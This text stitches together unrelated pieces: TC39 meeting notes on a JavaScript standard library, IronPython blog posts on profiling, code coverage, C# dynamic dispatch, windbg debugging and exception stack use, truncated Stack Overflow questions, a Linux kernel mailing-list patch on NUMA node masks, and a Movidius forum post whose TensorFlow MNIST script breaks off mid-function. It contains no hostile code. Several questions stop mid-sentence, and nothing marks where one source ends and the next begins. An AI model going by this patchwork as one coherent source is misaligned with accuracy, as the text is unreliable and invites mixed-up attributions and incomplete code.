DH: I agree, but to add some nuance: there are APIs that are universal in value but may be driven by people who are more accustomed to working in one body or another. There are certainly APIs that make sense in some contexts on the web and not in Node.js, and the namespace may not make sense for all contexts.
DD: Well, C++ will put web_view in std::. (Laughs)
MS: I agree, you want some functionality, not some broad capability. We want something that's easy for people to remember.
**SCR:** In Android, for example, the standard library will get implemented, but then it takes years to make it into the actual platform and become widespread enough to use. You end up with messy ways of implementing fallbacks and polyfills; for example, you need to pull in polyfill code for everyone, even browsers that support said feature, unless you have sophisticated fallback mechanisms. I think a really important part of this discussion is how we deal with this and make a transparent and standard way of handling these fallbacks/polyfills rather than dumping the fallback/polyfill problem into userland.
AK: This seems like a good segue to the TAG meetup.
WH: I object because we only have a slideshow at this point. I very much want a standard library, but it's not yet clear to me what we're signing up for for stage 1 here. If you can clarify what is and what isn't in scope, I will support it. Is the goal just to specify the mechanics of how people implement modules and how people use them? Is the goal to specify the modules themselves? Is the goal to set up liaisons with other organizations to define the modules?
MS: It's clear we're talking about the mechanics, right? Of how people use them and define them?
WH: Correct. Are we also trying to define the actual standard library modules?
MS: No, I am not saying definitively whether future proposals for the standard library require the staging process. But to be clear, the Temporal module of the standard library is not part of this proposal. This is just concerned with the mechanics.
TST: Is it fair to say that you don't want to include any functionality here, but you also don't want to develop this in a vacuum, so it should go in tandem?
WH: Yes, it's fine to collaborate. Thank you for the clarifications. I withdraw my objection.
MS: It's something that we've needed for a long time; we need a way to offer a way to introduce a standard library.
TB: MPT said that we would need guidance. Temporal is a global feature, but if std were available, it would help that proposal.
Conclusion/Resolution
- Stage 1 acceptance
- JHD feedback for stage 2: address polyfill question, and sync usage in Scripts
Dynamic Languages and the Programmers that Love Them
Unfortunately, there are a few problems with this approach – some obvious, some subtle.
But we do have working code now, so this is a good time to take a break. We’ll tackle some of these issues in the next installment. The current version of the source code can be downloaded from here.
The only feedback I’ve gotten so far about the IronPython Profiler is that it would be nice not to have to specify a command-line option to use it. Imagine that you’ve got a REPL open and are in the middle of some interactive development – something at which I think Python excels. You’ve spent a fair amount of time setting up data and code, but now there’s something that’s running slowly that you’d like to analyze. Restarting your REPL means having to repeat all that setup work.
As a result of this feedback, we’ve added a new EnableProfiler method to the clr module. clr.EnableProfiler(True) will enable profiling, and clr.EnableProfiler(False) will disable it again.
Of course, IronPython is a compiler, and the calls to capture profiler data are compiled right into your code. You can’t just throw a switch to turn on profiling without actually forcing the code in question to be recompiled. This can be done by doing a reload() on the module that contains the code. Naturally, all the standard caveats for reload apply. In particular, any references to the old code from other modules and from instantiated objects don’t get automatically updated.
While making this change, it occurred to me that we could get function-level code coverage for free simply by looking for functions that had been compiled but not called at the end of a test run. This required a small change to the code that is run when you call clr.GetProfilerData(). Previously, this function only returned records for methods which had actually been called. This is how it continues to behave when no parameters are used. But when you call clr.GetProfilerData(True), you get all compiled methods – even those that were never used.
Armed with this change, here’s how I modified the test runner for a project I’m working on:
import sys

def _trySetupCoverage():
    # Scan the command line for --coverage=<file>; if found, turn on the
    # IronPython profiler and strip the argument so the tests don't see it.
    for i in xrange(1, len(sys.argv)):
        arg = sys.argv[i]
        if arg.startswith('--coverage='):
            import clr
            clr.EnableProfiler(True)
            coverage_file = arg[11:]
            del sys.argv[i]
            return coverage_file
    return None

def _tryFinishCoverage(coverage_file):
    if coverage_file is None:
        return
    import clr
    hits, misses = {}, {}
    # GetProfilerData(True) returns all compiled methods, even uncalled ones
    for p in clr.GetProfilerData(True):
        # Assume no module name contains a colon
        end = p.Name.find(':')
        if end < 0 or not p.Name.startswith('module '):
            continue
        module = p.Name[7:end]
        if p.Calls > 0:
            hits[module] = hits.get(module, 0) + 1
        else:
            misses[module] = misses.get(module, 0) + 1
    with open(coverage_file, 'w') as f:
        # Report every compiled module, including those with no called functions
        modules = sorted(set(hits.keys()) | set(misses.keys()))
        for mod in modules:
            h = hits.get(mod, 0)
            m = misses.get(mod, 0)
            total = h + m
            if total > 0:
                # Write module, covered functions, total functions, percentage
                # TODO: Log functions that lack coverage
                f.write('%s\t%d\t%d\t%.1f\n' % (mod, h, total, 100.0 * h / total))

if __name__ == "__main__":
    coverage = _trySetupCoverage()
    RunAllTests(None, None, None)       # project-specific test entry point
    _tryFinishCoverage(coverage)
    sys.exit(len(FAILED_LIST))          # FAILED_LIST is maintained by the test runner
This code could be trivially modified so that an exception is thrown if coverage drops below a certain percentage. If the tests were being run as part of a checkin gate, it would then prevent code from being added to source control unless it was at least superficially under test.
I call this “poor man’s code coverage” because it was cheaply obtained and is not very sophisticated. It won’t tell us anything, for instance, if a module has not been imported at all. Nonetheless, it’s a potentially useful addition to the box of tools that’s available for IronPython.
These changes were made after IronPython 2.6 Alpha 1 was released, so if you want to play with them you’ll need to grab a recent source drop – one not earlier than Change Set 49035.
As always, your feedback could influence any further development in this direction.
Here’s a sample program profile.py that demonstrates the statistics we’re gathering by printing them on exit.
import atexit
import clr
from System.Threading import Thread

def delay(seconds):
    Thread.CurrentThread.Join(1000 * seconds)

def print_profile():
    for p in clr.GetProfilerData():
        print '%s\t%d\t%d\t%d' % (p.Name, p.InclusiveTime, p.ExclusiveTime, p.Calls)

atexit.register(print_profile)
delay(1)
The profiler isn’t enabled by default, as it does have a small impact on performance. You need to opt into it by running IronPython with the flag “-X:EnableProfiler”. If you use this flag with the above code, you’ll get the following output:
These records are returned in the order that they were compiled, not the order that they were first called – except that methods which were never called are omitted entirely.
A record with the name “module site” means the top-level import of the site module.
Other records that start with the name “module” refer to Python code.
Records that start with “type” refer to .NET code that is called directly from IronPython.
Times are recorded in “Ticks”, which are increments of 100ns. That means that the 10077140 ticks spent in the Thread.Join method are actually 1.007714 second.
Here’s what this profiler doesn’t do a good job of recording: the time required to parse Python, compile it into expression trees, generate the IL and JIT the IL. Some of this is accounted for in the time it takes to import an external module, but not in a way that provides visibility to the constituent parts.
We’d love to get your feedback on this experimental addition to IronPython. Happy profiling!
I crashed Mads' C# Tech Chat at Tech Ed EMEA in Barcelona on the grounds that the dynamic world has monkey-patched C#. It was fun, and I had the opportunity to answer a few dynamic/DLR-related questions that Mads was probably more capable of handling than I was.
One question that I choked on was whether or not this new language feature could be used to enable multiple dispatch from within C#. My gut feeling was that the answer was “yes”, but I couldn’t quite justify the answer so I hedged and hemmed and hawed and didn’t provide anything remotely like a satisfactory answer for the guy asking the question.
But now that I’ve had the benefit of a good night’s rest, the answer is blindingly obvious: yes, and here’s the evidence in some C# 4 sample code:
public class A { }
public class B : A { }
public class C : B { }

public class D { }
public class E : D { }

public class Test {
    public void Multi(D d, A a) { System.Console.WriteLine("DA"); }
    public void Multi(D d, B b) { System.Console.WriteLine("DB"); }
    public void Multi(D d, C c) { System.Console.WriteLine("DC"); }
    public void Multi(E e, A a) { System.Console.WriteLine("EA"); }
    public void Multi(E e, B b) { System.Console.WriteLine("EB"); }
    public void Multi(E e, C c) { System.Console.WriteLine("EC"); }

    public static void Main() {
        Test test = new Test();

        // Static types: a, b, c are declared A; d, e are declared D.
        A a = new A();
        A b = new B();
        A c = new C();
        D d = new D();
        D e = new E();

        // Statically bound: overload resolution uses only the declared
        // types, so all three calls pick Multi(D, A).
        test.Multi(d, a);
        test.Multi(e, b);
        test.Multi(e, c);

        // Dynamically bound: overload resolution happens at runtime,
        // using the actual types of both arguments.
        test.Multi((dynamic)d, (dynamic)a);
        test.Multi((dynamic)e, (dynamic)b);
        test.Multi((dynamic)e, (dynamic)c);
    }
}
This produces the output
DA
DA
DA
DA
EB
EC
Why does it work?
When you use dynamic, you’re telling the C# binder to ignore anything that it knows about the type at compile time and to instead determine dispatch based on the actual type at runtime. The statically-bound method calls, by contrast, performs a dispatch based solely on the declared type.
So there you have it – one more use for dynamic: painless implementation of multiple dispatch.
(Thanks to Lucian Wischik for pointing out a flaw with the original version of this post.)
Let's say you're working on a project such as IronPython or IronRuby that makes use of Reflection.Emit to generate code at runtime. You're probably used to seeing a stack trace in Visual Studio that looks something like this:
Visual Studio will do its best to prevent you from viewing any part of that [Lightweight Function]. It won't let you trace into those methods, even while viewing from assembly language. If you're feeling clever, you can use the registers view and the and memory view to identify the return address on the stack, but there's no way of knowing for sure whether or not the caller is actual code or just a thunk of some kind.
But it turns out that there's another way of doing this that's fairly straightforward.
The managed debugger operates at a fairly high level of abstraction (as far as debuggers go). So when the going gets tough, the tough resort to windbg.exe (or its command-line cousin cdb.exe). These are part of the Debugging Tools for Windows, which can be downloaded from.
Here's what you need to do.
1. If you're not viewing it in Visual Studio already, bring up the Debug Location toolbar, which looks like this:
This will tell us the name and id of the process and thread that we need to connect to from windbg.
2. If you haven't already, start windbg. From the File menu, select Attach to a Process -- or hit F6.
Here's the key part. When you select the process for connecting, you want to specify that it's a noninvasive attach:
In Windows, only a single process can connect to any given other process as the debugger. Visual Studio is already the registered debugger for this instance of IronPython, so windbg cannot establish the same relationship with it. What "Noninvasive" debugging does is to use SuspendThread to suspend all the threads in the target process and then use ReadProcessMemory to access its internals. At that point, it's not unlike debugging a core dump; you have the entire memory image to look at, but you can't actually set breakpoints or execute any code inside that process.
There's plenty of information about noninvasive debugging at various locations on the net.
For our needs -- looking at the MSIL and the native machine code for methods generated through Reflection.Emit -- this turns out to be good enough.
3. Now we'll want to load the SOS Debugging Extension. This actually ships with the .NET runtime now, so there should be nothing for you to load. Unfortunately, the ".loadby" windbg command doesn't seem to work when we do a noninvasive connect, so you'll have to type a full path in the command to load the extension. With a default installation of Windows, this will probably be
.load C:\Windows\Microsoft.NET\Framework\v2.0.50727\SOS.dll (for a 32-bit process), or
.load C:\Windows\Microsoft.NET\Framework64\v2.0.50727\SOS.dll (for a 64-bit process).
4. Let's make sure that we're looking at the right thread. You can get a list of threads by using the "~" command, or you can choose "Processes and Threads" from the View menu. The thread identifiers here are expressed in hexadecimal, so you'll need to do a quick conversion from the "1440" in Visual Studio to 5a0. Here's the output from the "~" command.
0:000> ~
.  0  Id: 1c04.15f8 Suspend: 1 Teb: 7ffdf000 Unfrozen
   1  Id: 1c04.11e8 Suspend: 1 Teb: 7ffde000 Unfrozen
   2  Id: 1c04.16cc Suspend: 1 Teb: 7ffdd000 Unfrozen
   3  Id: 1c04.d08  Suspend: 1 Teb: 7ffdc000 Unfrozen
   4  Id: 1c04.153c Suspend: 1 Teb: 7ffda000 Unfrozen
   5  Id: 1c04.1478 Suspend: 1 Teb: 7ffd7000 Unfrozen
   6  Id: 1c04.d14  Suspend: 1 Teb: 7ffd9000 Unfrozen
   7  Id: 1c04.102c Suspend: 1 Teb: 7ffd6000 Unfrozen
   8  Id: 1c04.ac0  Suspend: 1 Teb: 7ffd5000 Unfrozen
   9  Id: 1c04.1118 Suspend: 1 Teb: 7ffd4000 Unfrozen
  10  Id: 1c04.5a0  Suspend: 1 Teb: 7ffd3000 Unfrozen
  11  Id: 1c04.13d8 Suspend: 1 Teb: 7ffd8000 Unfrozen
In this list, thread 10 matches the one where we hit the breakpoint in Visual Studio -- so we can switch to this thread from thread 0 by executing "~10 s". Alternatively, if you were viewing the "Processes and Threads" window, you could just double-click on the thread in question.
5. Now we're ready to look at the stack. Execute the command "!clrstack". The output should closely resemble the stack trace that you see in Visual Studio -- except now you'll see names for all of those "Lightweight Function" frames. You'll also get the stack pointer and instruction pointer for each frame. The result should look something like this:
0:010> !clrstack
OS Thread Id: 0x66c (10)
ESP      EIP
0572da10 04f85469 IronPython.Modules.PythonNT.chdir(System.String)
0572da80 04a81b99 DynamicClass._stub_$11##11(System.Runtime.CompilerServices.Closure, System.Scripting.Actions.CallSite, System.Scripting.Runtime.CodeContext, System.Object, System.String)
0572dab8 04a81ab1 DynamicClass._stub_MatchCaller(System.Object, System.Scripting.Actions.CallSite, System.Object[])
0572dae4 047fa24d System.Scripting.Actions.CallSite`1[[System.__Canon, mscorlib]].UpdateAndExecute(System.Object[])
0572dc68 04f60307 System.Scripting.Actions.UpdateDelegates.Update3[[System.__Canon, mscorlib],[System.__Canon, mscorlib],[System.__Canon, mscorlib],[System.__Canon, mscorlib],[System.__Canon, mscorlib]](System.Scripting.Actions.CallSite, System.__Canon, System.__Canon, System.__Canon)
0572dce8 04a81925 DynamicClass.<module>$10##10(System.Runtime.CompilerServices.Closure, System.Scripting.Runtime.Scope, System.Scripting.Runtime.LanguageContext)
0572dd88 04a74ab8 System.Scripting.ScriptCode.InvokeTarget(System.Linq.Expressions.LambdaExpression, System.Scripting.Runtime.Scope)
6. That second-from-top entry looks intriguing. How can we see its code? The first thing we need to do is to get a method descriptor for it, which we can do using the SOS command !ip2md.
0:010> !ip2md 04a81b99
MethodDesc: 047ee580
Method Name: DynamicClass._stub_$11##11(System.Runtime.CompilerServices.Closure, System.Scripting.Actions.CallSite, System.Scripting.Runtime.CodeContext, System.Object, System.String)
Class: 047ee2c0
MethodTable: 047ee324
mdToken: 06000000
Module: 047e6b48
IsJitted: yes
CodeAddr: 04a81b18
With the method descriptor, the !dumpil command will show us the actual MSIL for this method.
0:010> !dumpil 047ee580
This is dynamic IL. Exception info is not reported at this time.
If a token is unresolved, run "!do <addr>" on the addr given
in parenthesis. You can also look at the token table yourself, by
running "!DumpArray 01eb82ec".
If you want to see what the associated x86 or x64 machine code looks like, the "CodeAddr" value from the !ip2md command will give you the starting address of the JITted code. You can pass it to the windbg "u" command (for "unassemble"), e.g. "u 04a81b18".
7. Once you're done, be sure to detach windbg from the program you're looking at; it's quite likely that Visual Studio will be hung until you do. That's because it will be waiting to get data back from the debug thread that was injected into the target process -- but windbg has suspended that thread on your behalf. "Detach Debuggee" is a menu choice on the "Debug" menu.
One of the interesting things that's possible with cdb.exe -- the command-line version of windbg.exe -- is to control it from a separate program. All of the functionality we used above is accessible through cdb. You can therefore write a program that starts a separate cdb process, piping commands to its standard input and reading -- and parsing -- the results from its standard output. You could even write a GUI that shows the stack of the target process, and when the user clicks on a frame it puts up the MSIL for that frame into one pane and the assembly code into another.
Write it using IronPython.
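If you want to try that, here's a rough sketch of the core plumbing in (Iron)Python. Treat it as an assumption-laden starting point: the cdb.exe path and the process id are placeholders, and the piped commands simply mirror the manual steps above.

import subprocess

CDB = r"C:\Program Files\Debugging Tools for Windows\cdb.exe"  # assumed install path
pid = 7172  # placeholder: id of the process you want to inspect

# -pv asks for a noninvasive attach; -p selects the target by process id.
proc = subprocess.Popen([CDB, "-pv", "-p", str(pid)],
                        stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                        universal_newlines=True)

commands = "\n".join([
    r".load C:\Windows\Microsoft.NET\Framework\v2.0.50727\SOS.dll",
    "~10 s",      # switch to the thread of interest
    "!clrstack",  # dump the managed stack, lightweight functions included
    "qd",         # quit and detach, resuming the suspended target
]) + "\n"

out, _ = proc.communicate(commands)
print(out)  # parse the frames out of this however you like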
A stack overflow is not a recoverable exception under .NET. When your program runs out of stack space, the CLR will tear down your process without giving you the chance to do anything about it.
So, how many frames can you get onto the stack before the world blows up? Obviously, this depends both on the size of the stack and on the size of each individual frame, but we can get ballpark numbers by setting up a simple recursive test.
On my laptop, I ran the following program and found that a value of 61450 would reliably produce a stack overflow exception.
using System;

public class Program {
    static int max;

    static void Test(int i) {
        if (i >= max) throw new ArgumentException("done");
        Test(i + 1);
    }

    public static void Main(string[] args) {
        max = Int32.Parse(args[0]);
        try {
            Test(0);
        } catch (Exception) {
        }
        System.Console.WriteLine("Test succeeded");
    }
}
Now, let's change this program just a little bit so that we rethrow the exception once per stack frame.
using System;

public class Program {
    static int max;

    static void Test(int i) {
        try {
            if (i >= max) throw new ArgumentException("done");
            Test(i + 1);
        } catch (Exception) {
            throw;
        }
    }

    public static void Main(string[] args) {
        max = Int32.Parse(args[0]);
        try {
            Test(0);
        } catch (Exception) {
        }
        System.Console.WriteLine("Test succeeded");
    }
}
With this change, the number of stack frames I can create drops down to about 18900. What's responsible for the difference? When an exception is thrown under .NET, the stack isn't cleaned up until a catch handler finishes executing normally. In this code, that doesn't happen until the end of the handler in the main function is reached. When we enter that catch block, the stack still contains each of the 18900 frames that we got from calling the Test function recursively. It also contains some kind of data from each of the 18900 exceptions that were rethrown.
These tests were all performed on a 32-bit edition of Windows Vista. When I rerun the first test under a 64-bit operating system, I get a much smaller number of frames: 13673. By default, a pure MSIL application will run as a 64-bit process on a 64-bit operating system. This has definite implications for the stack. For one thing, the return address now occupies 8 bytes instead of four. The x64 calling convention also requires the caller to set aside 32 bytes of "shadow space" on the stack regardless of the actual number of bytes used. Finally, the stack must be kept 16-byte aligned. These variations add up quickly when you multiply by ten thousand frames.
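A quick sanity check on those numbers (assuming the default 1 MB thread stack, which the post doesn't state but is the usual default): 61450 frames in 1 MB works out to roughly 17 bytes per frame on x86, while 13673 frames implies about 77 bytes per frame on x64. Both figures are plausible for a method this small, given the per-frame overheads just described.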
Finally, when performing the second test under x64, the program dies after only 114 frames. This appears to be because each thrown exception in the 64-bit CLR takes nearly 8 KB of stack space. So the next time you read that it's a bad idea to rethrow exceptions, you'll have one more reason to agree with the sentiment.
As it turns out, plenty.
One of the differences between the CLR and the Python language is that a Python exception can be of any Python class, while the CLR basically requires that an exception be an instance of System.Exception or a class derived from it. Even if it didn't, we don't have a 1-to-1 mapping between Python classes and CLR classes, so we can't use the equivalent of "catch (PythonDefinedException pde) {}" in our emitted code. Instead, we throw a System.Exception with which we associate the thrown Python object. That means that every Python catch block defined by user code needs to "catch (Exception e)" and then look at the actually thrown object in the catch block. If its type does not match any except handlers, we have no choice but to rethrow.
In other words, consider the following code:
def inner(i):
    try:
        if i < 50: return inner(i + 1)
        raise RuntimeError, 'Raised after fifty'
    except TypeError:
        return 0

try:
    inner(0)
except:
    print 'Caught'
When IronPython generates code for the except handler of the inner() function, it has to catch all exceptions and examine them for their type. In this sample, that will first happen on the fifty-first invocation of inner(). Because RuntimeError does not match the TypeError criterion, the exception will be rethrown -- and caught again on each of the 50 subsequent exception handlers it meets in the inner() function while unwinding the stack.
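To make that concrete, here is a rough Python model of what the generated handler has to do. This is a simplification for illustration only: the real thing is emitted MSIL, and get_python_object is a made-up helper standing in for unwrapping the thrown Python object from the carrying CLR exception.

def run_guarded(body, handlers):
    try:
        body()
    except Exception, e:                  # catch *every* CLR exception...
        thrown = get_python_object(e)     # hypothetical unwrap helper
        for exc_type, handler in handlers:
            if isinstance(thrown, exc_type):
                return handler(thrown)    # a matching except clause runs
        raise                             # no match: rethrow and keep unwinding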
It gets better.
In order to be able to display a Python stack trace when an exception happens we wrap generated code in a fault handler. A fault handler is a feature of MSIL that's not currently available when programming in C# -- it's basically the equivalent of a finally block that only runs if the guarded block is exited via an exception. However, there's a catch (if you'll pardon the pun). The fine print in the MSDN documentation tells us that exception fault blocks aren't supported when emitting dynamic methods. As a result, when building a dynamic method, the DLR will replace a fault block with an ordinary catch block which will (say it with me) rethrow the exception.
This means that -- in the Python code snippet above -- we may end up with as many as 102 exception objects on the stack before it is finally unwound.
So far, we haven't gotten any reports of this issue causing trouble "in the wild". As such, I present it here largely as an intellectual curiosity and as a somewhat entertaining diversion. If you do run into this problem, please let us know by filing a bug at the IronPython website. It is always possible to force a .NET application to run as a 32-bit process under a 64-bit operating system, and that would be my suggestion for a temporary workaround.
May your cup run over, but your stack stay well below its limit line. Good night, and good luck.
My project is on MVC 4. In it I can't access any of the Scripts functions, like @Scripts.Render("~/bundles/modernizr"), as Scripts is an ambiguous reference between 'System.Web.WebPages.Scripts' and 'System.Web.Optimization.Scripts'. I have the following entries in my web.config:

<pages>
<namespaces> <add namespace="System.Web.Helpers"
My requirement is to invoke some processing from a Jenkins build server, to determine whether the domain model has changed since the last build. I've come to the conclusion that the way forward is to write a script that will invoke a sequence of existing scripts from the db-migration plugin. Then I can invoke it in the step that calls test-app and war. I've looked in the Grails doc
Some sites have many scripts. For example orionhub. In such a case Chrome's Developer Tools become a little bit confusing (see picture). Is there a way to filter the shown scripts, for example by name?

Edit: I found that when I am in the "Scripts" context I can start typing and the first script matching the word I typed so far will be selected.
I've got a database change management workflow in place. It's based on SQL scripts (so, it's not a managed code-based solution).

The basic setup looks like this:

Initial/
    Generate Initial Schema.sql
    Generate Initial Required Data.sql
    Generate Initial Test Data.sql
Migration/
    0001_MigrationScriptForChangeOne.sql
    0002
In my ASP.NET MVC4 application's RegisterBundles method, I create the following script bundle:

bundles.Add(new ScriptBundle("~/bundles/whatever")
    .Include("~/Scripts/whatever1.js")
    .Include("~/Scripts/Whatever/whatever2.js"));

So, "whatever1.js" is directly under the Scripts folder, whilst "whatever2.js" is in a subfolder under Scripts.
When I open Google Chrome's developer tools, I do not get the Scripts tab. I have done this on two computers, one running Windows 7 and the other Windows Server 2008 R2. Can you please tell me what I need to do to get the Scripts tab back. Many thanks!
Do the userdata scripts run before or after the ones set up to run on every boot? Is there a way to change the priority?
I have a very strange problem. IE throws me error messages when I try to use jQuery utilities such as $.cookie. The problem only occurs when I try to access these functions from an external script. If I use these functions in the script page itself they work.

Any idea?
I am presuming (without really knowing) that "gant" is superior to "ant", especially when building grails applications. I have some old, inherited, grails apps using ant. Is it possible or easy to convert existing build.xml files into gant build scripts?
I have a script that streams files from a server and saves the gathered data, small chunks at a time to prevent memory overflow, on the host server.

Did I mention it is a PHP script?

This is how it works:

// loop while data exists on the client's server-side file
while (!feof($xml_fp)) {
    // grab data in proportions of specified ch
On Wed, 2007-08-15 at 09:31 -0500, Serge E. Hallyn wrote:
> Quoting Lee Schermerhorn (Lee.Schermerhorn@hp.com):
> > On Tue, 2007-08-14 at 14:56 -0700, Christoph Lameter wrote:
> > > On Tue, 14 Aug 2007, Lee Schermerhorn wrote:
> > > >
> > > > > Ok then you did not have a NUMA system configured. So its okay for the
> > > > > dummies to ignore the stuff. CONFIG_NODES_SHIFT is a constant and does not
> > > > > change. The first bit is always set.
> > > >
> > > > The first bit [node 0] is only set for the N_ONLINE [and N_POSSIBLE]
> > > > mask. We could add the static init for the other masks, but since
> > > > non-numa platforms are going through the __build_all_zonelists, they
> > > > might as well set the MEMORY bits explicitly. Or, maybe you'll
> > > > disagree ;-).
> > >
> > > The bitmaps can be completely ignored if !NUMA.
> > >
> > > In the non NUMA case we define
> > >
> > > static inline int node_state(int node, enum node_states state)
> > > {
> > > 	return node == 0;
> > > }
> > >
> > > So its always true for node 0. The "bit" is set.
> >
> > The issue is with the N_*_MEMORY masks. They don't get initialized
> > properly because node_set_state() is a no-op if !NUMA. So, where we
> > look for intersections with or where we AND with the N_*_MEMORY masks we
> > get the empty set.
> > >
> > > We are trying to get cpusets to work with !NUMA? Sounds reasonable.
> >
> > Well, yes. In Serge's case, he's trying to use cpusets with !NUMA.
> > He'll have to comment on the reasons for that. Looking at all of the
>
> So I can lock a container to a cpu on a non-numa machine.
>
> > #ifdefs and init/Kconfig, CPUSET does not depend on NUMA--only SMP and
> > CONTAINERS [altho' methinks CPUSET should select CONTAINERS rather than
> > depend on it...]. So, you can use cpusets to partition of cpus in
> > non-NUMA configs.
> >
> > In the more general case, tho', I'm looking at all uses of the
> > node_online_map and for_each_online_node, for instances where they
> > should be replaced with one of the *_MEMORY masks. IMO, generic code
> > that is compiled independent of any CONFIG option, like NUMA, should
> > just work, independent of the config. Currently, as Serge has shown,
> > this is not the case. So, I think we should fix the *_MEMORY maps to be
> > correctly populated in both the NUMA and !NUMA cases. A couple of
> > options:
> >
> > 1) just use node_set() when populating the masks,
> >
> > 2) initialize all masks to include at least cpu/node 0 in the !NUMA
> > case.
> >
> > Serge chose #1 to fix his problem. I followed his lead to fix the other
> > 2 places where node_set_state() was being used to initialize the NORMAL
> > memory node mask and the CPU node mask. This will add a few unnecessary
> > instructions to !NUMA configs, so we could change to #2.
> >
> > Thoughts?
>
> Paul, is the mems stuff in cpusets only really useful for NUMA cases?
> (I think it is... but am not sure) If so I suppose one alternative
> could be to just disable that when !NUMA. But disabling cpusets when
> !NUMA is completely wrong.
>
> I personally would think that 1) is still the best option. Otherwise
> the action
>
>   echo $SOME_CPU > /cpusets/set1/cpu
>   echo $SOME_CPU > /cpusets/set1/mems
>
> works on a numa machine, and is wrong on a non-numa machine. With
> option 1, the second part doesn't actually restrict the memory, but
> at least /cpusets/set1/mems exists and $SOME_CPU doesn't have to be 0 to
> be valid.

Well, you really shouldn't be writing cpu ids to the cpuset mems file.
Rather, it takes node ids.
And on !NUMA configs, only node 0 exists.

Can you actually write a !0 cpuid to the mems file with the current
option #1 patch [that uses node_set() to populate the node_states[]]?
It should allow something like:

	echo 0,1<and maybe others> >/cpusets/set1/mems

As long as one of the specified node ids has memory, it will silently
ignore any that don't.

If you're up for it, you could try the following patch to statically
initialize the node state masks, in place of the "option 1" patch. Be
aware, tho', that I've only tested on my ia64 NUMA platform. I did
compile it [page_alloc.c] without error under allnoconfig.

Lee

-----------------
PATCH Initialize N_*_MEMORY and N_CPU masks for non-NUMA config

Against: 2.6.23-rc2-mm2

Statically initialize the N_*_MEMORY and N_CPU node state masks
for !NUMA configurations. This static initialization is required
because the node_set_state() function becomes a no-op for !NUMA.
Other generic code assumes that these masks are set correctly.

Note that in NUMA configurations, these masks will be populated
correctly, so don't bother with static initialization. No sense
in making assumptions that could be broken down the road, resulting
in extra work for someone to debug. Unlikely, perhaps, but who
needs the aggravation...

Signed-off-by: Lee Schermerhorn <lee.schermerhorn@hp.com>

 mm/page_alloc.c | 9 ++++++++-
 1 file changed, 8 insertions(+), 1 deletion(-)

Index: Linux/mm/page_alloc.c
===================================================================
--- Linux.orig/mm/page_alloc.c	2007-08-15 10:01:23.000000000 -0400
+++ Linux/mm/page_alloc.c	2007-08-15 10:05:41.000000000 -0400
@@ -52,7 +52,14 @@
  */
 nodemask_t node_states[NR_NODE_STATES] __read_mostly = {
 	[N_POSSIBLE] = NODE_MASK_ALL,
-	[N_ONLINE] = { { [0] = 1UL } }
+	[N_ONLINE] = { { [0] = 1UL } },
+#ifndef CONFIG_NUMA
+	[N_NORMAL_MEMORY] = { { [0] = 1UL } },
+#ifdef CONFIG_HIGHMEM
+	[N_HIGH_MEMORY] = { { [0] = 1UL } },
+#endif
+	[N_CPU] = { { [0] = 1UL } },
+#endif	/* NUMA */
 };
 EXPORT_SYMBOL(node_states);
Hello,
I am trying to run facenet (Inception ResNet V1) on Movidius. Please point me towards any tutorial on how to start compiling for tensorflow. I tried mvNCCompile on the mnist softmax.py example from the tensorflow website and got the following error. Please help. I am also attaching the softmax.py which I used to create a frozen graph.
mvNCCompile mnist_output/mnist_default.meta -in=input -s12 -o=mnist_graph -on=output
mvNCCompile v02.00, Copyright @ Movidius Ltd 2016
/usr/local/lib/python3.5/dist-packages/tensorflow/python/util/tf_inspect.py:45: DeprecationWarning: inspect.getargspec() is deprecated, use inspect.signature() instead
  if d.decorator_argspec is not None), _inspect.getargspec(target))
[Error 34] Setup Error: Values for input contain placeholder. Pass an absolute value.
softmax.py code below:
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import argparse
import sys
import tempfile

from tensorflow.examples.tutorials.mnist import input_data

import tensorflow as tf

FLAGS = None


def deepnn(x):
  """deepnn builds the graph for a deep net for classifying digits.

  Args:
    x: an input tensor with the dimensions (N_examples, 784), where 784 is
    the number of pixels in a standard MNIST image.

  Returns:
    A tuple (y, keep_prob). y is a tensor of shape (N_examples, 10), with
    values equal to the logits of classifying the digit into one of 10
    classes (the digits 0-9). keep_prob is a scalar placeholder for the
    probability of dropout.
  """
  # Reshape to use within a convolutional neural net.
  # Last dimension is for "features" - there is only one here, since images
  # are grayscale -- it would be 3 for an RGB image, 4 for RGBA, etc.
  with tf.name_scope('reshape'):
    x_image = tf.reshape(x, [-1, 28, 28, 1])

  # First convolutional layer - maps one grayscale image to 32 feature maps.
  with tf.name_scope('conv1'):
    W_conv1 = weight_variable([5, 5, 1, 32])
    b_conv1 = bias_variable([32])
    h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)

  # Pooling layer - downsamples by 2X.
  with tf.name_scope('pool1'):
    h_pool1 = max_pool_2x2(h_conv1)

  # Second convolutional layer -- maps 32 feature maps to 64.
  with tf.name_scope('conv2'):
    W_conv2 = weight_variable([5, 5, 32, 64])
    b_conv2 = bias_variable([64])
    h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)

  # Second pooling layer.
  with tf.name_scope('pool2'):
    h_pool2 = max_pool_2x2(h_conv2)

  # Fully connected layer 1 -- after 2 rounds of downsampling, our 28x28
  # image is down to 7x7x64 feature maps -- maps this to 1024 features.
  # (This layer was garbled in the original post; restored from the
  # standard TensorFlow MNIST tutorial.)
  with tf.name_scope('fc1'):
    W_fc1 = weight_variable([7 * 7 * 64, 1024])
    b_fc1 = bias_variable([1024])
    h_pool2_flat = tf.reshape(h_pool2, [-1, 7 * 7 * 64])
    h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)

  # Dropout - controls the complexity of the model, prevents co-adaptation
  # of features.
  with tf.name_scope('dropout'):
    keep_prob = tf.placeholder(tf.float32)
    h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)

  # Map the 1024 features to 10 classes, one for each digit
  with tf.name_scope('fc2'):
    W_fc2 = weight_variable([1024, 10])
    b_fc2 = bias_variable([10])
    y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2
  return y_conv, keep_prob


def conv2d(x, W):
  """conv2d returns a 2d convolution layer with full stride."""
  return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')


def max_pool_2x2(x):
  """max_pool_2x2 downsamples a feature map by 2X."""
  return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
                        strides=[1, 2, 2, 1], padding='SAME')


def weight_variable(shape):
  """weight_variable generates a weight variable of a given shape."""
  initial = tf.truncated_normal(shape, stddev=0.1)
  return tf.Variable(initial)


def bias_variable(shape):
  """bias_variable generates a bias variable of a given shape."""
